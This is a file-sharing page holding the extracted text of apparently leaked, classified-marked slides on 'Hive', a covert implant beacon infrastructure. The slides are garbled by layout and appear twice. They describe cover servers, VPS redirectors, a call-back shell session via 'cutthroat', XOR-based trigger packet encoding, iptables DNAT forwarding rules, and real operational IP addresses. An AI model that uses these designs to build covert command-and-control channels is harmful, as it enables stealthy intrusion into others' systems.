Hive Operating Environment
This document was uploaded by user and they confirmed that they have the permission to share it. If you are author or own the copyright of this book, please report to us by using this DMCA report form. Report DMCA
Overview
Download & View Hive Operating Environment as PDF for free.
More details
- Words: 1,628
- Pages: 16
Loading documents preview...
SECRET//NOFORN
Hive Beacon Infrastructure VPS Server Apache with Mod Proxy IPTABLES Forwarding Implanted Host
Implanted Host
Proxy / VPN Server
Cover Server
Implanted Host
Proxy / VPN Server Implanted Host
Log Files Honeycomb
One-way Transfer
RIPPER SNAPPER Database
Blot 4.0
DNS Server
SSL Session Implanted Host
OSN VPN Network Connections Linux-based Infrastructure
SECRET//NOFORN
1
SECRET//NOFORN
Hive Beacon Test Infrastructure VPS Servers IPTABLES Forwarding
6 Implanted Host
Cover domain: vhost1.edb.devlan.net
tap010
eth0
10.6.5.191
1
tap011
172.16.63.1
Bridge: br1
Bridge: br2
eth1
10.6.5.190
10.177.77.1 172.16.64.1
Blot
VPN tunnels
eth1
172.16.63.101
eth0
10.6.5.192
2
tap041
4
Cover Server
10.6.5.197 tap040
Cover Server Address Mapping 172.16.64.11: vhost1 172.16.64.12: vhost2 … ...
eth2
Beastbox
tap030
tap031
tap020 Implanted Host
tap032
3
172.16.64.10
10.6.5.196
eth1
5
tap021
172.16.63.2
10.2.4.119 Honeycomb
Cover domain: vhost2.edb.devlan.net
Tool Handler
VPS Proxy Port Redirection Map Command Post
Inbound
Redirected
80
8001
443
44301
Bridge: br0
SECRET//NOFORN
2
SECRET//NOFORN
Hive Beacon Test Infrastructure VPS Server
IPTABLES Forwarding Implanted Host
tap1
eth0
10.6.5.191
1
tap11
172.16.63.1
Bridge: br1
Bridge: br2
tap41
eth1
Target domain: vhost1.edb.devlan.net
10.177.77.1
tap32
172.16.64.1
Blot
VPN tunnels
172.16.63.101
Implanted Host
tap2
eth0
10.6.5.192
Target domain: vhost2.edb.devlan.net
tap21
2
eth1
172.16.63.2
172.16.64.10
eth1
3
4
Cover Server
10.6.5.197 tap4
Cover Server Ports 172.16.64.11: vhost1 172.16.64.12: vhost2 … ...
eth2
Beastbox
tap31
10.6.5.196 tap3
Blot In-bound Ports 8001: vhost1 44301: vhost1 8002: vhost2 44302: vhost2 … ...
SECRET//NOFORN
5
10.2.4.119 Honeycomb Tool Handler
3
SECRET//NOFORN
Hive Beacon Test Infrastructure VPS Server
IPTABLES Forwarding Implanted Host
tap1
eth0
10.6.5.191
1
tap11
172.16.63.1
Bridge: br1
Bridge: br2
tap41
eth1
Target domain: vhost1.edb.devlan.net
10.177.77.1
tap32
172.16.64.1
Blot
VPN tunnels
172.16.63.101
Implanted Host
tap2
eth0
10.6.5.192
Target domain: vhost2.edb.devlan.net
tap21
2
eth1
172.16.63.2
172.16.64.10
eth1
3
4
Cover Server
10.6.5.197 tap4
Cover Server Ports 172.16.64.11: vhost1 172.16.64.12: vhost2 … ...
eth2
Beastbox
tap31
10.6.5.196 tap3
Blot In-bound Ports 8001: vhost1 44301: vhost1 8002: vhost2 44302: vhost2 … ...
SECRET//NOFORN
5
10.2.4.119 Honeycomb Tool Handler
4
TOP SECRET//SI//NOFORN
Hive Beacon Operational Infrastructure VPS Servers
CentOS-5.6 32-bit
IPTABLES Forwarding Target domain: playa-del-rio.com
Implanted Host
eth0
eth1
172.24.5.141/23
78.47.85.121/28
78.47.85.114/28 eth1
Cover Server
10.177.77.1
CentOS-5.8 64-bit
CentOS-5.6 32-bit eth0
VPN tunnels
91.93.104.178/25
Blot
eth1 Beastbox
172.24.5.132/23
Gateway:78.47.131.65
Implanted Host
eth0
78.47.131.68/29
eth1
Gateway: 88.198.156.225
Honeycomb
88.198.156.226/29 Target domain: viva-rio-engracado.com
172.24.5.188/23
Tool Handler
CentOS-5.8 64-bit
TOP SECRET//SI//NOFORN
5
TOP SECRET//SI//NOFORN
Hive Beacon Operational Infrastructure VPS Servers
CentOS-5.6 32-bit
IPTABLES Forwarding Target domain: playa-del-rio.com
Implanted Host
eth0
eth1
172.24.5.141/23
78.47.85.121/28
78.47.85.114/28 eth1
Cover Server
10.177.77.1
CentOS-5.8 64-bit
CentOS-5.6 32-bit eth0
VPN tunnels
91.93.104.178/25
Blot
eth1 Beastbox
172.24.5.132/23
Gateway:78.47.131.65
Implanted Host
eth0
78.47.131.68/29
eth1
Gateway: 88.198.156.225
Honeycomb
88.198.156.226/29 Target domain: viva-rio-engracado.com
172.24.5.188/23
Tool Handler
CentOS-5.8 64-bit
TOP SECRET//SI//NOFORN
6
SECRET//NOFORN
SinnerTwin Deployment Environment
SECRET//NOFORN
7
SECRET//NOFORN
Hive Operation hived
SSL Session
hclient / cutthroat GENESIS ICON Workstation
Implanted Host
Listening port TriggerListen fork_process
Trigger
P C start_triggered_connect TriggerCallbackSession
P C
StartClientSession launchShell
$ ./cutthroat ./hive > ilm connect
Call-back shell open
> shell open
shell
SECRET//NOFORN
8
SECRET//NOFORN
Raw TCP/UDP Trigger Hive 2.5 Algorithm 400 Bytes 0
8 8-bytes Random Data
92 CRC Random Data
Random Data of length CRC % 200
CRC
12-byte Integer PAD N x 127
25-byte PAD
1-byte 2XOR byte value PAD
Encoded 12-byte Trigger
Random Data
The twelve byte trigger is encoded by XORing the 1-byte XOR value with the first five bytes of the trigger and the remaining trigger bytes or XORed with 0xB6.
Hive 2.6 Algorithm 126 Bytes Minimum / 472 Bytes Maximum 0
8 8-bytes Random Data
92 CRC Random Data
Random Data of length CRC % 200
CRC
Integer 8-byte N x 127 PAD1
Encoded 8-byte 12-byte PAD2 Trigger
Random Data of length CRC % 146
The twelve byte trigger is encoded by computing an offset of CRC % 72 into the CRC random data field and XORing each of the twelve following bytes with the corresponding byte of the twelve-byte trigger payload.
SECRET//NOFORN
9
Scrap slides follow
10
SECRET//SI//NOFORN
Hive Beacon Lab Test Infrastructure Implanted Hosts
Implanted Host PowerPC Implanted Host MIPSBE Implanted Host x86 Implanted Host sparc
VPS Servers
Proxy / Director
Response Servers
eth0 10.2.5.5 00:0C:42:99:8A:E1
eth0 10.2.5.6
VLAN 65 CentOS-6.2 64-bit
00:0C:42:4D:7B:DE
Target domain: domainA.com eth0 10.6.5.190 52:54:00:9A:B0:72
eri0 10.2.5.5 00:03:BA:86:6A:78
eth0 10.6.5.191/24
tun0 10.177.77.10
eth1 172.16.63.1/24
CentOS-5.9 32-bit
CentOS-6.3 64-bit VPN tunnels
eth1 172.16.63.101
tun0 10.177.77.1
Implanted Host
eth0 10.6.5.192/24
eth1 172.16.64.10
eth1 172.16.63.2/24
Beastbox
VLAN 65
eth2 172.16.64.1
eth0 10.6.5.196
VLAN 65
eth1 172.16.64.100
Honeycomb
eth0 10.6.5.198
Tool Handler
CentOS-6.2 64-bit
CentOS-6.2 64-bit
Bridge: hive1 eth0 10.6.5.195/24
eth0 10.6.5.197
Blot
Target domain: domainB.com
Command Post
Cover Server
Bridge: hive2
VLAN 65
SECRET//SI//NOFORN
11
SECRET//SI//NOFORN
Hive Test Infrastructure Implanted Hosts
Implanted Host PowerPC Implanted Host MIPSBE Implanted Host x86 Implanted Host sparc
VPS Servers
Proxy / Director
eth0 10.2.5.5 00:0C:42:99:8A:E1
eth0 10.2.5.6
VLAN 65 CentOS-6.2 64-bit
00:0C:42:4D:7B:DE
Target domain: domainA.com eth0 10.6.5.190 52:54:00:9A:B0:72
eri0 10.2.5.5 00:03:BA:86:6A:78
tun0 10.177.77.a
eth1 172.16.63.1/24
eth0 10.6.5.191/24
CentOS-6.3 64-bit
eth1 172.16.63.101
VPN tunnels
eth1:1 172.16.63.102
tun0 10.177.77.b
Implanted Host
Response Servers
tun0 10.177.77.1
eth0 10.6.5.193 52:54:00:95:DA:16
eth0 10.6.5.192/24
eth1 172.16.63.2/24
eth1 172.16.64.10 eth1:1 .11 eth1:2 .12
CentOS-5.9 32-bit
Blot Beastbox
VLAN 65
eth0 10.6.5.196
VLAN 65
eth1 172.16.64.100
Honeycomb
eth0 10.6.5.198
Tool Handler
CentOS-6.2 64-bit
CentOS-6.2 64-bit
Bridge: hive1 eth0 10.6.5.195/24
eth0 10.6.5.197
eth2 172.16.64.1
Target domain: domainB.com
Command Post
Cover Server
Bridge: hive2
VLAN 65
SECRET//SI//NOFORN
12
SECRET//SI//NOFORN
New Hive Test Infrastructure Implanted Hosts
Implanted Host PowerPC Implanted Host MIPSBE Implanted Host sparc
VPS Servers
Proxy / Director
eth0 10.2.5.5 00:0C:42:99:8A:E1
eth0 10.2.5.6
VLAN 65 CentOS-6.2 64-bit
00:0C:42:4D:7B:DE
Target domain: domainA.com eri0 10.2.5.5
eth1 172.16.64.10
00:03:BA:86:6A:78
eth0 10.6.5.191/24
eth1 172.16.63.1/24
implant1
eth1 172.16.63.111
eth0 10.6.5.190
SSL
52:54:00:9A:B0:72
domainA.com
CentOS-6.4 64-bit
CentOS-6.3 64-bit
Implanted Host x86
Response Servers
eth1:1 172.16.63.112
Nginx Proxy
eth1:1 .11 .12
Cover Server
eth0 10.6.5.197
domainB.com eth1:2
eth2 172.16.64.2
VLAN 65
eth0 10.6.5.189 implant2
Implanted Host
eth0 10.6.5.193 52:54:00:95:DA:16
eth0 10.6.5.192/24
eth1 172.16.63.2/24
VLAN 65
Target domain: domainB.com
CentOS-6.2 64-bit
eth0 10.6.5.195/24
Honeycomb Tool Handler
eth0 10.6.5.198
CentOS-6.2 64-bit
Bridge: hive1 Command Post
eth1 172.16.64.100 domainA.com eth1:1 .101 domainB.com eth1:2 .102
Bridge: hive2 #!/bin/bash # Script to configure policy routing
VLAN 65
echo -en “101\thiveA >> /etc/iproute2/rt_tables echo -en “102\thiveB >> /etc/iproute2/rt_tables ip route add default via 172.16.63.2 table hiveA ip route add default via 172.16.63.2 table hiveB ip rule add from 172.16.63.111 table hiveA prio 1 ip rule add from 172.16.63.112 table hiveB prio 1
SECRET//SI//NOFORN
13
SECRET//NOFORN
Hive Beacon Test Infrastructure VPS Server
IPTABLES Forwarding Implanted Host
eth0
10.3.2.174
Target domain: vhost1.edb.devlan.net
172.16.63.1 p3p2
172.16.64.10 172.16.63.101
Implanted Host
10.3.2.185
Blot Proxy
172.16.64.1
Cover Server
10.3.2.113
with:
VPN Server Apache Server
10.3.2.125
Honeycomb 10.2.4.119
172.16.63.131
Tool Handler
Target domain: vhost2.edb.devlan.net
VPS Server IPTABLES Configuration iptables -P INPUT DROP iptables -P FORWARD DROP iptables -p OUTPUT DROP iptables -A INPUT -p tcp --dport 22 -j ACCEPT iptables -A OUTPUT -p tcp --sport 22 -j ACCEPT DNAT iptables -t nat -A PREROUTING -i eth0 -p tcp --sport 1024:65535 -d 10.3.2.174 --dport 53 -j DNAT --to-destination 172.16.63.101:443 iptables -t nat -A PREROUTING -i eth0 -p tcp --sport 1024:65535 -d 10.3.2.174 --dport 80 -j DNAT --to-destination 172.16.63.101:443 iptables -t nat -A PREROUTING -i eth0 -p tcp --sport 1024:65535 -d 10.3.2.174 --dport 443 -j DNAT --to-destination 172.16.63.101:443 FORWARDING iptables -A FORWARD -i eth0 -o p3p2 -m state --state ESTABLISHED,RELATED -j ACCEPT iptables -A FORWARD -i p3p2 -o eth0 -m state --state ESTABLISHED,RELATED -j ACCEPT iptables -A FORWARD -i eth0 -o p3p2 -p tcp --sport 1024:65535 -d 172.16.63.101 --dport 53 -m state --state NEW -j ACCEPT iptables -A FORWARD -i eth0 -o p3p2 -p tcp --sport 1024:65535 -d 172.16.63.101 --dport 80 -m state --state NEW -j ACCEPT iptables -A FORWARD -i eth0 -o p3p2 -p tcp --sport 1024:65535 -d 172.16.63.101 --dport 443 -m state --state NEW -j ACCEPT SNAT iptables -t nat -A POSTROUTING -o p3p2 -j MASQUERADE
SECRET//NOFORN
14
SECRET//NOFORN
Hive Beacon Test Infrastructure VPS Server
IPTABLES Forwarding Implanted Host
tap1
eth0
10.6.5.191
Target domain: vhost1.edb.devlan.net
tap11
Bridge: br1
172.16.63.1
Bridge: br2
eth1
tap32
172.16.63.101
Implanted Host
tap2
eth0
10.6.5.192
tap31
tap21
Blot Proxy
172.16.64.1
172.16.64.10 tap41
Cover Server
10.6.5.197 tap4
with:
VPN Server Apache Server
10.6.5.196 tap3
eth1
Honeycomb 10.2.4.119
Tool Handler
172.16.63.2
Target domain: vhost2.edb.devlan.net
VPS Server IPTABLES Configuration iptables -P INPUT DROP iptables -P FORWARD DROP iptables -p OUTPUT DROP iptables -A INPUT -p tcp --dport 22 -j ACCEPT iptables -A OUTPUT -p tcp --sport 22 -j ACCEPT DNAT iptables -t nat -A PREROUTING -i eth0 -p tcp --sport 1024:65535 -d 10.3.2.174 --dport 53 -j DNAT --to-destination 172.16.63.101:443 iptables -t nat -A PREROUTING -i eth0 -p tcp --sport 1024:65535 -d 10.3.2.174 --dport 80 -j DNAT --to-destination 172.16.63.101:443 iptables -t nat -A PREROUTING -i eth0 -p tcp --sport 1024:65535 -d 10.3.2.174 --dport 443 -j DNAT --to-destination 172.16.63.101:443 FORWARDING iptables -A FORWARD -i eth0 -o p3p2 -m state --state ESTABLISHED,RELATED -j ACCEPT iptables -A FORWARD -i p3p2 -o eth0 -m state --state ESTABLISHED,RELATED -j ACCEPT iptables -A FORWARD -i eth0 -o p3p2 -p tcp --sport 1024:65535 -d 172.16.63.101 --dport 53 -m state --state NEW -j ACCEPT iptables -A FORWARD -i eth0 -o p3p2 -p tcp --sport 1024:65535 -d 172.16.63.101 --dport 80 -m state --state NEW -j ACCEPT iptables -A FORWARD -i eth0 -o p3p2 -p tcp --sport 1024:65535 -d 172.16.63.101 --dport 443 -m state --state NEW -j ACCEPT SNAT iptables -t nat -A POSTROUTING -o p3p2 -j MASQUERADE
SECRET//NOFORN
15
SECRET//NOFORN
Hive Beacon Test Infrastructure VPS Server
IPTABLES Forwarding Implanted Host
tap1
eth0
10.6.5.191
Target domain: vhost1.edb.devlan.net
tap11
172.16.63.1
Bridge: br1
Bridge: br2
172.16.64.10 tap41
eth1
Implanted Host
tap2
eth0
10.6.5.192
Target domain: vhost2.edb.devlan.net
tap21 eth1
172.16.63.2
tap31
10.6.5.197 tap4
Cover Server Ports 172.16.64.11: vhost1 172.16.64.12: vhost2 … ...
tap32
172.16.64.1
172.16.63.101
Cover Server
Blot Proxy with:
VPN Server Apache Server
Blot In-bound Ports 8001: vhost1 44301: vhost1 8002: vhost2 44302: vhost2 … ...
10.6.5.196
SECRET//NOFORN
tap3
Honeycomb 10.2.4.119
Tool Handler
16
Hive Beacon Infrastructure VPS Server Apache with Mod Proxy IPTABLES Forwarding Implanted Host
Implanted Host
Proxy / VPN Server
Cover Server
Implanted Host
Proxy / VPN Server Implanted Host
Log Files Honeycomb
One-way Transfer
RIPPER SNAPPER Database
Blot 4.0
DNS Server
SSL Session Implanted Host
OSN VPN Network Connections Linux-based Infrastructure
SECRET//NOFORN
1
SECRET//NOFORN
Hive Beacon Test Infrastructure VPS Servers IPTABLES Forwarding
6 Implanted Host
Cover domain: vhost1.edb.devlan.net
tap010
eth0
10.6.5.191
1
tap011
172.16.63.1
Bridge: br1
Bridge: br2
eth1
10.6.5.190
10.177.77.1 172.16.64.1
Blot
VPN tunnels
eth1
172.16.63.101
eth0
10.6.5.192
2
tap041
4
Cover Server
10.6.5.197 tap040
Cover Server Address Mapping 172.16.64.11: vhost1 172.16.64.12: vhost2 … ...
eth2
Beastbox
tap030
tap031
tap020 Implanted Host
tap032
3
172.16.64.10
10.6.5.196
eth1
5
tap021
172.16.63.2
10.2.4.119 Honeycomb
Cover domain: vhost2.edb.devlan.net
Tool Handler
VPS Proxy Port Redirection Map Command Post
Inbound
Redirected
80
8001
443
44301
Bridge: br0
SECRET//NOFORN
2
SECRET//NOFORN
Hive Beacon Test Infrastructure VPS Server
IPTABLES Forwarding Implanted Host
tap1
eth0
10.6.5.191
1
tap11
172.16.63.1
Bridge: br1
Bridge: br2
tap41
eth1
Target domain: vhost1.edb.devlan.net
10.177.77.1
tap32
172.16.64.1
Blot
VPN tunnels
172.16.63.101
Implanted Host
tap2
eth0
10.6.5.192
Target domain: vhost2.edb.devlan.net
tap21
2
eth1
172.16.63.2
172.16.64.10
eth1
3
4
Cover Server
10.6.5.197 tap4
Cover Server Ports 172.16.64.11: vhost1 172.16.64.12: vhost2 … ...
eth2
Beastbox
tap31
10.6.5.196 tap3
Blot In-bound Ports 8001: vhost1 44301: vhost1 8002: vhost2 44302: vhost2 … ...
SECRET//NOFORN
5
10.2.4.119 Honeycomb Tool Handler
3
SECRET//NOFORN
Hive Beacon Test Infrastructure VPS Server
IPTABLES Forwarding Implanted Host
tap1
eth0
10.6.5.191
1
tap11
172.16.63.1
Bridge: br1
Bridge: br2
tap41
eth1
Target domain: vhost1.edb.devlan.net
10.177.77.1
tap32
172.16.64.1
Blot
VPN tunnels
172.16.63.101
Implanted Host
tap2
eth0
10.6.5.192
Target domain: vhost2.edb.devlan.net
tap21
2
eth1
172.16.63.2
172.16.64.10
eth1
3
4
Cover Server
10.6.5.197 tap4
Cover Server Ports 172.16.64.11: vhost1 172.16.64.12: vhost2 … ...
eth2
Beastbox
tap31
10.6.5.196 tap3
Blot In-bound Ports 8001: vhost1 44301: vhost1 8002: vhost2 44302: vhost2 … ...
SECRET//NOFORN
5
10.2.4.119 Honeycomb Tool Handler
4
TOP SECRET//SI//NOFORN
Hive Beacon Operational Infrastructure VPS Servers
CentOS-5.6 32-bit
IPTABLES Forwarding Target domain: playa-del-rio.com
Implanted Host
eth0
eth1
172.24.5.141/23
78.47.85.121/28
78.47.85.114/28 eth1
Cover Server
10.177.77.1
CentOS-5.8 64-bit
CentOS-5.6 32-bit eth0
VPN tunnels
91.93.104.178/25
Blot
eth1 Beastbox
172.24.5.132/23
Gateway:78.47.131.65
Implanted Host
eth0
78.47.131.68/29
eth1
Gateway: 88.198.156.225
Honeycomb
88.198.156.226/29 Target domain: viva-rio-engracado.com
172.24.5.188/23
Tool Handler
CentOS-5.8 64-bit
TOP SECRET//SI//NOFORN
5
TOP SECRET//SI//NOFORN
Hive Beacon Operational Infrastructure VPS Servers
CentOS-5.6 32-bit
IPTABLES Forwarding Target domain: playa-del-rio.com
Implanted Host
eth0
eth1
172.24.5.141/23
78.47.85.121/28
78.47.85.114/28 eth1
Cover Server
10.177.77.1
CentOS-5.8 64-bit
CentOS-5.6 32-bit eth0
VPN tunnels
91.93.104.178/25
Blot
eth1 Beastbox
172.24.5.132/23
Gateway:78.47.131.65
Implanted Host
eth0
78.47.131.68/29
eth1
Gateway: 88.198.156.225
Honeycomb
88.198.156.226/29 Target domain: viva-rio-engracado.com
172.24.5.188/23
Tool Handler
CentOS-5.8 64-bit
TOP SECRET//SI//NOFORN
6
SECRET//NOFORN
SinnerTwin Deployment Environment
SECRET//NOFORN
7
SECRET//NOFORN
Hive Operation hived
SSL Session
hclient / cutthroat GENESIS ICON Workstation
Implanted Host
Listening port TriggerListen fork_process
Trigger
P C start_triggered_connect TriggerCallbackSession
P C
StartClientSession launchShell
$ ./cutthroat ./hive > ilm connect
Call-back shell open
> shell open
shell
SECRET//NOFORN
8
SECRET//NOFORN
Raw TCP/UDP Trigger Hive 2.5 Algorithm 400 Bytes 0
8 8-bytes Random Data
92 CRC Random Data
Random Data of length CRC % 200
CRC
12-byte Integer PAD N x 127
25-byte PAD
1-byte 2XOR byte value PAD
Encoded 12-byte Trigger
Random Data
The twelve byte trigger is encoded by XORing the 1-byte XOR value with the first five bytes of the trigger and the remaining trigger bytes or XORed with 0xB6.
Hive 2.6 Algorithm 126 Bytes Minimum / 472 Bytes Maximum 0
8 8-bytes Random Data
92 CRC Random Data
Random Data of length CRC % 200
CRC
Integer 8-byte N x 127 PAD1
Encoded 8-byte 12-byte PAD2 Trigger
Random Data of length CRC % 146
The twelve byte trigger is encoded by computing an offset of CRC % 72 into the CRC random data field and XORing each of the twelve following bytes with the corresponding byte of the twelve-byte trigger payload.
SECRET//NOFORN
9
Scrap slides follow
10
SECRET//SI//NOFORN
Hive Beacon Lab Test Infrastructure Implanted Hosts
Implanted Host PowerPC Implanted Host MIPSBE Implanted Host x86 Implanted Host sparc
VPS Servers
Proxy / Director
Response Servers
eth0 10.2.5.5 00:0C:42:99:8A:E1
eth0 10.2.5.6
VLAN 65 CentOS-6.2 64-bit
00:0C:42:4D:7B:DE
Target domain: domainA.com eth0 10.6.5.190 52:54:00:9A:B0:72
eri0 10.2.5.5 00:03:BA:86:6A:78
eth0 10.6.5.191/24
tun0 10.177.77.10
eth1 172.16.63.1/24
CentOS-5.9 32-bit
CentOS-6.3 64-bit VPN tunnels
eth1 172.16.63.101
tun0 10.177.77.1
Implanted Host
eth0 10.6.5.192/24
eth1 172.16.64.10
eth1 172.16.63.2/24
Beastbox
VLAN 65
eth2 172.16.64.1
eth0 10.6.5.196
VLAN 65
eth1 172.16.64.100
Honeycomb
eth0 10.6.5.198
Tool Handler
CentOS-6.2 64-bit
CentOS-6.2 64-bit
Bridge: hive1 eth0 10.6.5.195/24
eth0 10.6.5.197
Blot
Target domain: domainB.com
Command Post
Cover Server
Bridge: hive2
VLAN 65
SECRET//SI//NOFORN
11
SECRET//SI//NOFORN
Hive Test Infrastructure Implanted Hosts
Implanted Host PowerPC Implanted Host MIPSBE Implanted Host x86 Implanted Host sparc
VPS Servers
Proxy / Director
eth0 10.2.5.5 00:0C:42:99:8A:E1
eth0 10.2.5.6
VLAN 65 CentOS-6.2 64-bit
00:0C:42:4D:7B:DE
Target domain: domainA.com eth0 10.6.5.190 52:54:00:9A:B0:72
eri0 10.2.5.5 00:03:BA:86:6A:78
tun0 10.177.77.a
eth1 172.16.63.1/24
eth0 10.6.5.191/24
CentOS-6.3 64-bit
eth1 172.16.63.101
VPN tunnels
eth1:1 172.16.63.102
tun0 10.177.77.b
Implanted Host
Response Servers
tun0 10.177.77.1
eth0 10.6.5.193 52:54:00:95:DA:16
eth0 10.6.5.192/24
eth1 172.16.63.2/24
eth1 172.16.64.10 eth1:1 .11 eth1:2 .12
CentOS-5.9 32-bit
Blot Beastbox
VLAN 65
eth0 10.6.5.196
VLAN 65
eth1 172.16.64.100
Honeycomb
eth0 10.6.5.198
Tool Handler
CentOS-6.2 64-bit
CentOS-6.2 64-bit
Bridge: hive1 eth0 10.6.5.195/24
eth0 10.6.5.197
eth2 172.16.64.1
Target domain: domainB.com
Command Post
Cover Server
Bridge: hive2
VLAN 65
SECRET//SI//NOFORN
12
SECRET//SI//NOFORN
New Hive Test Infrastructure Implanted Hosts
Implanted Host PowerPC Implanted Host MIPSBE Implanted Host sparc
VPS Servers
Proxy / Director
eth0 10.2.5.5 00:0C:42:99:8A:E1
eth0 10.2.5.6
VLAN 65 CentOS-6.2 64-bit
00:0C:42:4D:7B:DE
Target domain: domainA.com eri0 10.2.5.5
eth1 172.16.64.10
00:03:BA:86:6A:78
eth0 10.6.5.191/24
eth1 172.16.63.1/24
implant1
eth1 172.16.63.111
eth0 10.6.5.190
SSL
52:54:00:9A:B0:72
domainA.com
CentOS-6.4 64-bit
CentOS-6.3 64-bit
Implanted Host x86
Response Servers
eth1:1 172.16.63.112
Nginx Proxy
eth1:1 .11 .12
Cover Server
eth0 10.6.5.197
domainB.com eth1:2
eth2 172.16.64.2
VLAN 65
eth0 10.6.5.189 implant2
Implanted Host
eth0 10.6.5.193 52:54:00:95:DA:16
eth0 10.6.5.192/24
eth1 172.16.63.2/24
VLAN 65
Target domain: domainB.com
CentOS-6.2 64-bit
eth0 10.6.5.195/24
Honeycomb Tool Handler
eth0 10.6.5.198
CentOS-6.2 64-bit
Bridge: hive1 Command Post
eth1 172.16.64.100 domainA.com eth1:1 .101 domainB.com eth1:2 .102
Bridge: hive2 #!/bin/bash # Script to configure policy routing
VLAN 65
echo -en “101\thiveA >> /etc/iproute2/rt_tables echo -en “102\thiveB >> /etc/iproute2/rt_tables ip route add default via 172.16.63.2 table hiveA ip route add default via 172.16.63.2 table hiveB ip rule add from 172.16.63.111 table hiveA prio 1 ip rule add from 172.16.63.112 table hiveB prio 1
SECRET//SI//NOFORN
13
SECRET//NOFORN
Hive Beacon Test Infrastructure VPS Server
IPTABLES Forwarding Implanted Host
eth0
10.3.2.174
Target domain: vhost1.edb.devlan.net
172.16.63.1 p3p2
172.16.64.10 172.16.63.101
Implanted Host
10.3.2.185
Blot Proxy
172.16.64.1
Cover Server
10.3.2.113
with:
VPN Server Apache Server
10.3.2.125
Honeycomb 10.2.4.119
172.16.63.131
Tool Handler
Target domain: vhost2.edb.devlan.net
VPS Server IPTABLES Configuration iptables -P INPUT DROP iptables -P FORWARD DROP iptables -p OUTPUT DROP iptables -A INPUT -p tcp --dport 22 -j ACCEPT iptables -A OUTPUT -p tcp --sport 22 -j ACCEPT DNAT iptables -t nat -A PREROUTING -i eth0 -p tcp --sport 1024:65535 -d 10.3.2.174 --dport 53 -j DNAT --to-destination 172.16.63.101:443 iptables -t nat -A PREROUTING -i eth0 -p tcp --sport 1024:65535 -d 10.3.2.174 --dport 80 -j DNAT --to-destination 172.16.63.101:443 iptables -t nat -A PREROUTING -i eth0 -p tcp --sport 1024:65535 -d 10.3.2.174 --dport 443 -j DNAT --to-destination 172.16.63.101:443 FORWARDING iptables -A FORWARD -i eth0 -o p3p2 -m state --state ESTABLISHED,RELATED -j ACCEPT iptables -A FORWARD -i p3p2 -o eth0 -m state --state ESTABLISHED,RELATED -j ACCEPT iptables -A FORWARD -i eth0 -o p3p2 -p tcp --sport 1024:65535 -d 172.16.63.101 --dport 53 -m state --state NEW -j ACCEPT iptables -A FORWARD -i eth0 -o p3p2 -p tcp --sport 1024:65535 -d 172.16.63.101 --dport 80 -m state --state NEW -j ACCEPT iptables -A FORWARD -i eth0 -o p3p2 -p tcp --sport 1024:65535 -d 172.16.63.101 --dport 443 -m state --state NEW -j ACCEPT SNAT iptables -t nat -A POSTROUTING -o p3p2 -j MASQUERADE
SECRET//NOFORN
14
SECRET//NOFORN
Hive Beacon Test Infrastructure VPS Server
IPTABLES Forwarding Implanted Host
tap1
eth0
10.6.5.191
Target domain: vhost1.edb.devlan.net
tap11
Bridge: br1
172.16.63.1
Bridge: br2
eth1
tap32
172.16.63.101
Implanted Host
tap2
eth0
10.6.5.192
tap31
tap21
Blot Proxy
172.16.64.1
172.16.64.10 tap41
Cover Server
10.6.5.197 tap4
with:
VPN Server Apache Server
10.6.5.196 tap3
eth1
Honeycomb 10.2.4.119
Tool Handler
172.16.63.2
Target domain: vhost2.edb.devlan.net
VPS Server IPTABLES Configuration iptables -P INPUT DROP iptables -P FORWARD DROP iptables -p OUTPUT DROP iptables -A INPUT -p tcp --dport 22 -j ACCEPT iptables -A OUTPUT -p tcp --sport 22 -j ACCEPT DNAT iptables -t nat -A PREROUTING -i eth0 -p tcp --sport 1024:65535 -d 10.3.2.174 --dport 53 -j DNAT --to-destination 172.16.63.101:443 iptables -t nat -A PREROUTING -i eth0 -p tcp --sport 1024:65535 -d 10.3.2.174 --dport 80 -j DNAT --to-destination 172.16.63.101:443 iptables -t nat -A PREROUTING -i eth0 -p tcp --sport 1024:65535 -d 10.3.2.174 --dport 443 -j DNAT --to-destination 172.16.63.101:443 FORWARDING iptables -A FORWARD -i eth0 -o p3p2 -m state --state ESTABLISHED,RELATED -j ACCEPT iptables -A FORWARD -i p3p2 -o eth0 -m state --state ESTABLISHED,RELATED -j ACCEPT iptables -A FORWARD -i eth0 -o p3p2 -p tcp --sport 1024:65535 -d 172.16.63.101 --dport 53 -m state --state NEW -j ACCEPT iptables -A FORWARD -i eth0 -o p3p2 -p tcp --sport 1024:65535 -d 172.16.63.101 --dport 80 -m state --state NEW -j ACCEPT iptables -A FORWARD -i eth0 -o p3p2 -p tcp --sport 1024:65535 -d 172.16.63.101 --dport 443 -m state --state NEW -j ACCEPT SNAT iptables -t nat -A POSTROUTING -o p3p2 -j MASQUERADE
SECRET//NOFORN
15
SECRET//NOFORN
Hive Beacon Test Infrastructure VPS Server
IPTABLES Forwarding Implanted Host
tap1
eth0
10.6.5.191
Target domain: vhost1.edb.devlan.net
tap11
172.16.63.1
Bridge: br1
Bridge: br2
172.16.64.10 tap41
eth1
Implanted Host
tap2
eth0
10.6.5.192
Target domain: vhost2.edb.devlan.net
tap21 eth1
172.16.63.2
tap31
10.6.5.197 tap4
Cover Server Ports 172.16.64.11: vhost1 172.16.64.12: vhost2 … ...
tap32
172.16.64.1
172.16.63.101
Cover Server
Blot Proxy with:
VPN Server Apache Server
Blot In-bound Ports 8001: vhost1 44301: vhost1 8002: vhost2 44302: vhost2 … ...
10.6.5.196
SECRET//NOFORN
tap3
Honeycomb 10.2.4.119
Tool Handler
16
Related Documents
Hive Operating Environment
March 2021 0
Hive Operating Environment - Test Infrastructure
March 2021 0
Hive Infrastructure Switchblade
March 2021 0
Environment 5 Telugu
February 2021 1
Operating Guidelines
January 2021 0
Mothership Hive Mind Issue 01
January 2021 3More Documents from "Francis Ha"
Hive Operating Environment
March 2021 0
235412822 Rod Stewart Songbook
March 2021 0
Research On Unemployment
February 2021 0
